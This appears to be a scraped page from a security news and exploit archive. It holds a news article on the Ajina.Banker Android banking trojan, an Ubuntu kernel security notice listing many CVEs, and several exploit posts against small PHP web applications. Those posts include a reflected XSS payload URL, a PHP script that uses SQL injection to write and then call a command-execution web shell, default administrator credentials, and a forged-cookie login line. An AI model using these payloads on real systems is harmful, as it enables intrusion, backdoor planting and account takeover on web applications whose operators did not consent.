A new Android malware called Trojan Ajina.Banker is targeting Central Asia – Discover how this malicious malware disguises…

A new Android malware called Trojan Ajina.Banker is targeting Central Asia – Discover how this malicious malware disguises itself as legitimate apps to steal banking information and intercept 2FA messages. Learn about the tactics used by the attackers and how to protect yourself from this growing threat.

Central Asia has become the target of a malicious new campaign distributing Android malware dubbed “Ajina.Banker.” Discovered by Group-IB in May 2024, Ajina.Banker has been wreaking havoc since November 2023 and around 1,400 unique variants of the malware were identified by researchers.

The malware is named after a malevolent Uzbek mythical spirit known for deception, shape-shifting, and chaos. Ajina.Banker targets unsuspecting users by masquerading as trusted applications like banking services, government portals, and everyday utilities “to maximize infection rates and entice people to download and run the malicious file, thereby compromising their devices.”

The malware primarily spreads through social engineering tactic on messaging platforms like Telegram. Attackers create numerous accounts to distribute malicious links and files disguised as enticing offers, promotions, or even local tax authority apps. Users lured by the promise of “lucrative rewards” or “exclusive access” unknowingly download and install the malware, compromising their devices.

The attackers also employ a multi-pronged approach, sending messages with just the malicious file attached, exploiting user curiosity. Additionally, they share links to channels hosting the malware, bypassing security measures in place on some community chats.

Ajina used themed messages and localized promotion strategies to create a sense of urgency and excitement in regional community chats, urging users to click on links or download files without suspecting malicious intent. These campaigns were conducted across multiple accounts, sometimes simultaneously, indicating a coordinated effort.

While primarily targeting users in Uzbekistan, Ajina.Banker’s reach extends beyond borders. The malware collects information on installed financial applications from various countries, including Armenia, Azerbaijan, Iceland, and Russia. Additionally, it gathers SIM card details and intercepts incoming SMS messages, potentially capturing 2FA codes for financial accounts.

The malware exhibits a concerning level of adaptability. The analysis reveals two distinct versions – com.example.smshandler and org.zzzz.aaa – suggesting ongoing development. Newer versions showcase additional functionalities, including the ability to steal user-provided phone numbers, bank card details, and PIN codes.

Group-IB’s investigation suggests Ajina.Banker operates on an affiliate program model. A core group manages the infrastructure, while a network of affiliates handles distribution and infection chains, likely incentivized by a share of the stolen funds.

To protect yourself and your devices from Ajina.Banker and similar threats, be cautious of unsolicited messages and downloads, stick to trusted app stores like Google Play Store, scrutinize app permissions, install security software, and stay updated on the latest malware threats and best practices for mobile security.

Rocky Cole, Co-Founder and COO of mobile device security company iVerify shared his comments about this cunning new campaign with Hackread.com:

“Credential theft is the number one action being taken by threat actors. It’s so easy to steal credentials on phones where smaller screens, lower attention spans, lack of training, and the mixing of personal and professional use cases put people at risk. This new Android malware is just a continuation of that trend and a prime example of why phones should be running EDR platforms to detect malicious APKs and social engineering attempts.”

1.  **Hackers using Google Sites to spread banking malware**
2.  **Google reveals spyware attack on Android, iOS, and Chrome**
3.  **Scylla Ad Fraud on iOS, Android Users Halted by Apple, Google**
4.  **V3B Phishing Kit Steals Logins and OTPs from EU Banking Users**
5.  **Android Banking Malware FjordPhantom Steals Via Virtualization**

New Android Malware Ajina.Banker Steals 2FA Codes, Spreads via Telegram

Ubuntu Security Notice 7007-1 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7007-1September 13, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm,linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-nvidia,linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-intel-iotg-5.15: Linux kernel for Intel IoT platformsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kerneldid not properly check for the device to be enabled before writing. A localattacker could possibly use this to cause a denial of service.(CVE-2024-25741)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - M68K architecture;  - MIPS architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Accessibility subsystem;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - Bluetooth drivers;  - Character device driver;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - FPGA Framework;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Macintosh device drivers;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Pin controllers subsystem;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Greybus lights staging drivers;  - Media staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - DesignWare USB3 driver;  - Framebuffer layer;  - ACRN Hypervisor Service Module driver;  - eCrypt file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFFS2 file system;  - JFS file system;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - IOMMU subsystem;  - Memory management;  - Netfilter;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Tracing infrastructure;  - 9P file system network protocol;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Multipath TCP;  - NET/ROM layer;  - NFC subsystem;  - Open vSwitch;  - Network traffic control;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - ALSA framework;  - SoC Audio for Freescale CPUs drivers;  - Kirkwood ASoC drivers;(CVE-2024-40961, CVE-2024-38597, CVE-2024-39468, CVE-2024-36978,CVE-2024-42161, CVE-2024-38573, CVE-2024-40905, CVE-2024-42094,CVE-2024-36894, CVE-2024-40914, CVE-2024-40956, CVE-2024-42106,CVE-2024-38610, CVE-2024-39506, CVE-2024-42098, CVE-2024-42232,CVE-2024-38590, CVE-2024-39488, CVE-2024-42127, CVE-2024-41006,CVE-2024-42131, CVE-2024-41005, CVE-2024-40963, CVE-2024-38559,CVE-2024-42130, CVE-2024-37078, CVE-2024-42082, CVE-2024-40984,CVE-2024-38560, CVE-2024-42090, CVE-2024-33621, CVE-2024-40974,CVE-2024-42115, CVE-2024-40971, CVE-2024-40943, CVE-2024-38627,CVE-2024-38548, CVE-2024-40934, CVE-2024-38579, CVE-2024-38558,CVE-2024-39495, CVE-2023-52884, CVE-2024-42225, CVE-2024-38659,CVE-2024-40927, CVE-2024-40967, CVE-2024-38624, CVE-2024-38583,CVE-2024-41047, CVE-2024-38623, CVE-2024-39509, CVE-2024-36971,CVE-2024-42120, CVE-2024-38589, CVE-2024-36270, CVE-2024-42105,CVE-2024-36032, CVE-2024-42101, CVE-2024-40908, CVE-2024-42089,CVE-2024-39482, CVE-2024-38662, CVE-2024-41007, CVE-2024-38635,CVE-2023-52887, CVE-2024-40912, CVE-2024-41027, CVE-2024-38598,CVE-2024-38381, CVE-2024-39503, CVE-2024-39301, CVE-2024-40988,CVE-2024-41000, CVE-2024-39507, CVE-2024-35247, CVE-2024-39277,CVE-2024-42229, CVE-2024-42085, CVE-2024-35927, CVE-2024-42224,CVE-2024-38567, CVE-2024-42097, CVE-2024-41049, CVE-2024-39466,CVE-2024-40957, CVE-2024-40978, CVE-2024-42093, CVE-2024-40937,CVE-2024-41034, CVE-2024-41048, CVE-2024-39471, CVE-2024-39502,CVE-2024-38555, CVE-2024-40970, CVE-2024-36972, CVE-2024-40995,CVE-2024-42154, CVE-2024-40916, CVE-2024-39505, CVE-2024-39475,CVE-2024-38599, CVE-2024-38596, CVE-2024-39493, CVE-2024-42124,CVE-2024-38549, CVE-2024-42084, CVE-2024-40942, CVE-2024-42077,CVE-2024-42152, CVE-2024-40904, CVE-2024-31076, CVE-2024-40960,CVE-2024-41035, CVE-2024-40945, CVE-2024-38605, CVE-2024-42140,CVE-2024-41041, CVE-2024-36014, CVE-2024-38612, CVE-2024-41092,CVE-2024-38546, CVE-2024-40902, CVE-2024-42068, CVE-2024-42121,CVE-2024-42236, CVE-2024-34777, CVE-2024-39467, CVE-2024-42087,CVE-2024-39501, CVE-2024-40980, CVE-2024-38550, CVE-2024-42223,CVE-2024-38607, CVE-2024-42247, CVE-2024-41046, CVE-2024-42080,CVE-2024-40901, CVE-2024-38571, CVE-2024-39480, CVE-2024-42070,CVE-2024-41093, CVE-2024-42148, CVE-2024-38601, CVE-2024-39500,CVE-2024-41097, CVE-2024-38565, CVE-2024-38661, CVE-2024-38615,CVE-2024-41040, CVE-2024-34027, CVE-2024-37356, CVE-2024-42157,CVE-2024-40941, CVE-2024-38634, CVE-2024-41004, CVE-2024-38780,CVE-2024-38552, CVE-2024-39276, CVE-2024-38618, CVE-2024-38588,CVE-2024-42086, CVE-2024-41087, CVE-2024-38582, CVE-2024-40932,CVE-2024-39489, CVE-2024-40968, CVE-2024-42119, CVE-2024-42137,CVE-2024-40929, CVE-2024-38591, CVE-2024-36489, CVE-2022-48772,CVE-2024-42153, CVE-2024-40959, CVE-2024-40987, CVE-2024-36015,CVE-2024-41044, CVE-2024-41002, CVE-2024-42109, CVE-2024-38587,CVE-2024-36286, CVE-2024-41055, CVE-2024-39469, CVE-2024-39487,CVE-2024-38580, CVE-2024-38619, CVE-2024-38613, CVE-2024-42145,CVE-2024-41095, CVE-2024-40958, CVE-2024-40911, CVE-2024-42102,CVE-2024-33847, CVE-2024-36974, CVE-2024-40994, CVE-2024-38633,CVE-2024-40981, CVE-2024-40983, CVE-2024-42096, CVE-2024-42104,CVE-2024-42092, CVE-2024-40954, CVE-2024-38637, CVE-2024-42240,CVE-2024-38621, CVE-2024-38578, CVE-2024-38547, CVE-2024-39490,CVE-2024-42076, CVE-2024-42244, CVE-2024-39499, CVE-2024-38586,CVE-2024-41089, CVE-2024-40976, CVE-2024-42095, CVE-2024-40931,CVE-2024-40990)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1052-gkeop   5.15.0-1052.59  linux-image-5.15.0-1062-ibm     5.15.0-1062.65  linux-image-5.15.0-1062-raspi   5.15.0-1062.65  linux-image-5.15.0-1064-intel-iotg  5.15.0-1064.70  linux-image-5.15.0-1064-nvidia  5.15.0-1064.65  linux-image-5.15.0-1064-nvidia-lowlatency  5.15.0-1064.65  linux-image-5.15.0-1066-gke     5.15.0-1066.72  linux-image-5.15.0-1066-kvm     5.15.0-1066.71  linux-image-5.15.0-1067-oracle  5.15.0-1067.73  linux-image-5.15.0-1068-gcp     5.15.0-1068.76  linux-image-5.15.0-1069-aws     5.15.0-1069.75  linux-image-5.15.0-121-generic  5.15.0-121.131  linux-image-5.15.0-121-generic-64k  5.15.0-121.131  linux-image-5.15.0-121-generic-lpae  5.15.0-121.131  linux-image-aws-lts-22.04       5.15.0.1069.69  linux-image-gcp-lts-22.04       5.15.0.1068.64  linux-image-generic             5.15.0.121.121  linux-image-generic-64k         5.15.0.121.121  linux-image-generic-lpae        5.15.0.121.121  linux-image-gke                 5.15.0.1066.65  linux-image-gke-5.15            5.15.0.1066.65  linux-image-gkeop               5.15.0.1052.51  linux-image-gkeop-5.15          5.15.0.1052.51  linux-image-ibm                 5.15.0.1062.58  linux-image-intel-iotg          5.15.0.1064.64  linux-image-kvm                 5.15.0.1066.62  linux-image-nvidia              5.15.0.1064.64  linux-image-nvidia-lowlatency   5.15.0.1064.64  linux-image-oracle-lts-22.04    5.15.0.1067.63  linux-image-raspi               5.15.0.1062.60  linux-image-raspi-nolpae        5.15.0.1062.60  linux-image-virtual             5.15.0.121.121Ubuntu 20.04 LTS  linux-image-5.15.0-1052-gkeop   5.15.0-1052.59~20.04.1  linux-image-5.15.0-1064-intel-iotg  5.15.0-1064.70~20.04.1+1  linux-image-5.15.0-1068-gcp     5.15.0-1068.76~20.04.1  linux-image-5.15.0-1069-aws     5.15.0-1069.75~20.04.1  linux-image-5.15.0-121-generic  5.15.0-121.131~20.04.1  linux-image-5.15.0-121-generic-64k  5.15.0-121.131~20.04.1  linux-image-5.15.0-121-generic-lpae  5.15.0-121.131~20.04.1  linux-image-aws                 5.15.0.1069.75~20.04.1  linux-image-gcp                 5.15.0.1068.76~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.121.131~20.04.1  linux-image-generic-hwe-20.04   5.15.0.121.131~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.121.131~20.04.1  linux-image-gkeop-5.15          5.15.0.1052.59~20.04.1  linux-image-intel               5.15.0.1064.70~20.04.1  linux-image-intel-iotg          5.15.0.1064.70~20.04.1  linux-image-oem-20.04           5.15.0.121.131~20.04.1  linux-image-oem-20.04b          5.15.0.121.131~20.04.1  linux-image-oem-20.04c          5.15.0.121.131~20.04.1  linux-image-oem-20.04d          5.15.0.121.131~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.121.131~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7007-1  CVE-2022-48772, CVE-2023-52884, CVE-2023-52887, CVE-2024-23848,  CVE-2024-25741, CVE-2024-31076, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34777, CVE-2024-35247, CVE-2024-35927,  CVE-2024-36014, CVE-2024-36015, CVE-2024-36032, CVE-2024-36270,  CVE-2024-36286, CVE-2024-36489, CVE-2024-36894, CVE-2024-36971,  CVE-2024-36972, CVE-2024-36974, CVE-2024-36978, CVE-2024-37078,  CVE-2024-37356, CVE-2024-38381, CVE-2024-38546, CVE-2024-38547,  CVE-2024-38548, CVE-2024-38549, CVE-2024-38550, CVE-2024-38552,  CVE-2024-38555, CVE-2024-38558, CVE-2024-38559, CVE-2024-38560,  CVE-2024-38565, CVE-2024-38567, CVE-2024-38571, CVE-2024-38573,  CVE-2024-38578, CVE-2024-38579, CVE-2024-38580, CVE-2024-38582,  CVE-2024-38583, CVE-2024-38586, CVE-2024-38587, CVE-2024-38588,  CVE-2024-38589, CVE-2024-38590, CVE-2024-38591, CVE-2024-38596,  CVE-2024-38597, CVE-2024-38598, CVE-2024-38599, CVE-2024-38601,  CVE-2024-38605, CVE-2024-38607, CVE-2024-38610, CVE-2024-38612,  CVE-2024-38613, CVE-2024-38615, CVE-2024-38618, CVE-2024-38619,  CVE-2024-38621, CVE-2024-38623, CVE-2024-38624, CVE-2024-38627,  CVE-2024-38633, CVE-2024-38634, CVE-2024-38635, CVE-2024-38637,  CVE-2024-38659, CVE-2024-38661, CVE-2024-38662, CVE-2024-38780,  CVE-2024-39276, CVE-2024-39277, CVE-2024-39301, CVE-2024-39466,  CVE-2024-39467, CVE-2024-39468, CVE-2024-39469, CVE-2024-39471,  CVE-2024-39475, CVE-2024-39480, CVE-2024-39482, CVE-2024-39487,  CVE-2024-39488, CVE-2024-39489, CVE-2024-39490, CVE-2024-39493,  CVE-2024-39495, CVE-2024-39499, CVE-2024-39500, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39507, CVE-2024-39509, CVE-2024-40901, CVE-2024-40902,  CVE-2024-40904, CVE-2024-40905, CVE-2024-40908, CVE-2024-40911,  CVE-2024-40912, CVE-2024-40914, CVE-2024-40916, CVE-2024-40927,  CVE-2024-40929, CVE-2024-40931, CVE-2024-40932, CVE-2024-40934,  CVE-2024-40937, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40954, CVE-2024-40956, CVE-2024-40957,  CVE-2024-40958, CVE-2024-40959, CVE-2024-40960, CVE-2024-40961,  CVE-2024-40963, CVE-2024-40967, CVE-2024-40968, CVE-2024-40970,  CVE-2024-40971, CVE-2024-40974, CVE-2024-40976, CVE-2024-40978,  CVE-2024-40980, CVE-2024-40981, CVE-2024-40983, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40990, CVE-2024-40994,  CVE-2024-40995, CVE-2024-41000, CVE-2024-41002, CVE-2024-41004,  CVE-2024-41005, CVE-2024-41006, CVE-2024-41007, CVE-2024-41027,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41040, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41047, CVE-2024-41048,  CVE-2024-41049, CVE-2024-41055, CVE-2024-41087, CVE-2024-41089,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41095, CVE-2024-41097,  CVE-2024-42068, CVE-2024-42070, CVE-2024-42076, CVE-2024-42077,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42089, CVE-2024-42090,  CVE-2024-42092, CVE-2024-42093, CVE-2024-42094, CVE-2024-42095,  CVE-2024-42096, CVE-2024-42097, CVE-2024-42098, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42109, CVE-2024-42115, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42127, CVE-2024-42130,  CVE-2024-42131, CVE-2024-42137, CVE-2024-42140, CVE-2024-42145,  CVE-2024-42148, CVE-2024-42152, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42161, CVE-2024-42223, CVE-2024-42224,  CVE-2024-42225, CVE-2024-42229, CVE-2024-42232, CVE-2024-42236,  CVE-2024-42240, CVE-2024-42244, CVE-2024-42247Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-121.131  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1069.75  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1068.76  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1066.72  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1052.59  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1062.65  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1064.70  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1066.71  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1064.65  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1067.73  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1062.65  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1069.75~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1068.76~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1052.59~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-121.131~20.04.1  https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1064.70~20.04.1

Ubuntu Security Notice USN-7007-1

Webpay E-Commerce version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Cross Site Scripting

Men Salon Management System version 2.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Men Salon Management System 2.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/msms/';// مسار ثابت لرفع الملف$path = 'C:\www\msms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Men Salon Management System 2.0 PHP Code Injection 

Emergency Ambulance Hiring Portal version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 Insecure Settings Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/eahp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Emergency Ambulance Hiring Portal 1.0 Insecure Settings

Car Washing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Car Washing Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/car-washing-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Car Washing Management System 1.0 Insecure Settings

Bus Pass Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Bus Pass Management System 1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/buspassms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Bus Pass Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Insecure Settings Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Auto/Taxi Stand Management System version 1.0 suffers from a php code injection vulnerability.

